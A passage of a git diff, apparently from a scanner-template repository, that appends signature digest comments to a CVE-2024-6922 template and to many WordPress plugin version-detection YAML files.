http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+) diff --git a/http/cves/2024/CVE-2024-6922.yaml b/http/cves/2024/CVE-2024-6922.yaml index 8ea93b506f..a5b10fbfe8 100644 --- a/http/cves/2024/CVE-2024-6922.yaml +++ b/http/cves/2024/CVE-2024-6922.yaml @@ -48,3 +48,4 @@ http: - type: status status: - 400 +# digest: 490a0046304402203bd01e5954da7c9aebe29de80f6db1a0f4773bbea2ea88852f3409cf1bb4a95e02203a545a71cc78849cd6a55a562b98c038c5a370292ba9e6014e0333f665a5cd35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..c32b220d83 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220090f69a833cab3cc2f8312f7387171adfb2a6b13991f217de639113cc74ce38a02210083f707d34b0214e9db1a337b729c34a1f35eaba036f269d34c93ce3b0aa74ee9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..d71c2b6df7 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e2eab4b5497d08d6410680181d0e91737bdfef7a988025c4f70fd0c18e376731022100ffde59db7522e2c4cc398bee25d0dfa11c7cedcaf241199a87b1fb1fd45d1b1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..0e11a8ec4a 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dbe72f1055f73fb2873b72bacdfa519be5d11da057b416416b197334522a134f02204b6e8df8d4d5f1d6243b80ee9221ceeb0bd85c239bf8f6cba8287bbfd4e641df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..5ac5e963ed 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f2ea70019864ff59ef0f8361a76b34043969ced9821f1282af117cb739f3738f022100e8ce8a422692e653a1d73e326546ff57931e9729bec928270811e569abcace8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..df1e1b21e7 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220630da8eff913fdbf804230508269b9d29c93bfacd48a930719efea4e47f383af022100a433996778866dafbc6cf7c5a1d04fe97b21098627eea94d99750129e8e1f919:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..ea640b8622 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100821f8c0fbf6e138765cd584a35a73c57b591d2612205d0445bc25a0124ec7e9b022100c1654dea2a232fc6c70abd68961a50788b183bdf477b77924ff7151661fb8cbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..d7e3bd0b2b 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202d824e3c655700208ae505ec2dbadcf1d17eff72bcb303f0148ee4f7c3cdee2b02205efdb65fbcfa4a711cc82c5c4177ac90a6dd2c899a04472eb91e642a15068b65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..3ea47ebbf6 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207998f2d37027e6d310418d0396118c8d1261284dab7141a03864a42c2f69047202202c9c4a33990120d36463e339cc41d4fedcb6c6918c7a4b6d15b7d23d31d6bede:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..1a9226d121 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220175b15d52dc4971094d9799625587426db7459d0a9330428464bdb8e4301475d0220501b5b7d3d9db1734eb0081474c0774345ef768ab725dc006ce66d6434c1d275:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..8983c65de2 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b5577072ab12c3038de4d11435cb6ff3f104dee4ffeb246740be594c93c99d1d022100e50957ac5b9f5908b5ded2fe92b1af31430e254e4ac610b1fec9b9d020422246:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..e92560357f 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022005fc87d871cf55b70afbb40a3b5cc81182e24442d935cf942116b5f7842107e70220502cdbd71c16c2c00e9df57b874755dffcc2d856a1d39578f6ee29fd692ce887:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..012476abc5 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022040ffe14a9569705c2cc41c91067a1906f6330aed89e92de76213404ef57d14f8022100dce0d68a84cd213cbc85ac2d19a7d2ae71e4cf1042c8ee601572d5b6f2f345e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..2deb6289b9 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e0efb49535052df071553d519a75fb7747eeb45dab40893c0e81550d3535952d0221008ca79e8a561983b4783220f140b3e645a3c3baa05a91bb80faf1c01a7c4a4639:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..c69be79e65 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100875449fe2ec6ddf47c8b5824515ceaa4fb3533ecbecb2797e34f06d8f4234ebf02202cdca60900d9181857f736564aa0d33a84111398506e7a8622c514b377903d60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..f65c61ff22 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eb2599be7c92dfb1a0f3dda5c1968e25160f5f96d06e27e9e7173bcab5bb710d022100d71a1a25f51800417edf83958bb434bf1d592055c02031517b0334a904221ad5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..156e9fb895 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206b9ee718bc1d1adb0b584a6151052316e8452507fc8631f341d26426a0132209022100c8465d6e86add951d552ef045e9c9e8a74ba2d109958c1f169b28c8c2f4a952d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..416e2adb19 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a2b45078209678d3f4742653a71d7a613d8fc82aaa99ca7ffdfb0f40da8f2b4102203fe8314bba765ceec84ea4f8102309f267ebd8ee33101f15cac27a82b4dc3281:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..8913c1ec97 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d10f2375d01346005767a63ecb5bbf6510b6e3f8d07a89507c7dee9420a8d5d9022100f49c55b3b41d1fc2b514f1faad28a8ca5a1416c8c4b5ceb03ad0a3ca55362797:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..5af4be6099 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220345ec511f0175a1706ebdf75061d0482b1ede4df90a5f1dd3f8dde707d771b1002202f7e457b8920c6b48bf818be03c19c1048c3f16daa4f25501585f6a488c70bdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..8e5753c822 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e1544474a19c073f30d73257a3bdfc3a5f7174fb4ccb0f6b89c0a1983cc7f278022100f5f5da3538c04d763d26e47ff69d06907b3041df7909d7eb2b15ae990db108d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..f1e92fef67 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207db5fcd4562bbca084b06c3d777dcd6f9e911ab04cfcfd1585f2779d1ad2831d022100c779c6dc9130c5ba962ff20f5fc3c2544df8ecacf06436945e0e07d6f4bfaa85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..af61acda27 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207e0b20bc0c255a775f1a257f3f8a8610aa65ab067795c23a90dd577e9ff58f4402206507f7801813f470f00e1cd1409e3e2a4f2f3599067f1b63f571d46bfbd1c8bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..53a1556bc8 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a2707e6143fae0e5dadfb372f26972a3906612a9d533294ecd37e65491155b4f022100d7458990437e988dbee0875eea63a5ea5705422c12e15c3ee0d90a0cc52b6a92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..347f8ce057 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f426ef438b93fa4bc631aeb152827f6d7f615d4d5a064dc3b914bd79b4c376610221009295713379eab9a0ae2069e145267df47d20f84d09b8dd1c4a47d612c4e435fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..48d64ce445 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022030b371191f5ecf62ca85593605763f497df821b7b8cd7278db592a40e6ac807702202c297db38f86f536e96e0344aed9c81824c34216baabc30aa9e1c762a9aa437b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..c93271f0b7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c822c8fd6ed4cebd06879aabb13165041f0be06a7581f4a944bf79747d515b2c022100dba3015f5476b563db8f7678a7d8e15554de20a8406076e17636277858cfba8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..7dbff53615 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022056af6671177a7d4431ceb839e968b50b0ac3f132e59355fd843d6c1a86cbae0f022003575b7f16d2794c055603c24b6f55521bddb9d09607de052aeb8a90783bf006:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..ee116c3650 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205e2cd8ed81bbc1c0d4f57b839e2ee1d7d6ea81b7c4cbdbffb65c36a026f9bf7f022100cf9e5e2bca70ad3c1b86dd56f86f0ad180a712495010db5a4caa29f55756175a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..3b3f8ba153 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022031361a48ce4f18439a271c9d0023773bfe8e2ca3de7d01a4db94ba3aa67d0054022000e9daf25efd09f629b39f8e1d557e86963fd9733cc3120a6a26be2e745261a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..2dd206874a 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022072ca4788ad590df01ae3cadd55cd527a9ef97530564c7c7765f69410f6b3708a022023ca38714a63c5796ce67a4c6cf1516d32aa65719356a4fad3ceef13cd24f7bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..0ff26345f4 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008bd5e45bd9e024e7e7ffc075533cae17f8b1ac1c0bf242695304eef5e8b86f6d022100d7ecde48f73c1a467b02cfbc7b99a102590fc75d86dc18d8a6b477d106a2e0fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..dccf83db5f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022015eeb258e65c1eb64453597d1f402721b55f8ec003dfeb4569c58bfe1a92e620022100f7fcf715a9be2627e6a0238d3f4e9bca4ae2bdc905a5ae103a895029bae1aedf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..ad074200b0 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202a2953f0314001fede1a7c99349cd258fe330122180143f739355d3c8141b3c9022053d5841d4d5c57a467b531792bf1ee33eeb7ea52ee9461e9004bf11c3aef4957:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..df0c459085 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a5f13976bb2f70e2c3cc5e4992929147f14a49dc73e187c38dc47cdd58485f73022065f3fb22c73053983c836ca7a97aaaa29227884fe2a3fd7ddc4f783b8ca73b89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..1573c9c072 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b0d63944a95769426d1254b4621b34602e755af624ca85cfc6b447173ce30dea022063cc7452e558e942e6ea694506bf6dde1b6fd654d538d8abfc1aa8ebca5e4555:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..c1808612be 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207ab62a61733ca4f90ad09de580a896375314e894a0da6c6f2fcf6b0b59878b8f022100a3aa0d1398caf0065ab7a56f313e390fbc940a427d98509a8b8089a3bf84a61c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..6359c2178d 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220502e06eba17e921053a62746a2fa0ad3ce3e9f2999690d9f04d98b28c97124a7022100decae809da204d4c7a45e98ccfc19c29616f34f57bc80c7006da37f7906d4312:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..4caf47d2af 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220525e087f0e45a0870c2ef9cb6e401112a6ff29cf80c71a002748ddec380dc668022076ee78dce72514621c729553ed6b3c1a2de2e224315abfaebfee824b1ebfa611:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..bc8d851bd0 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 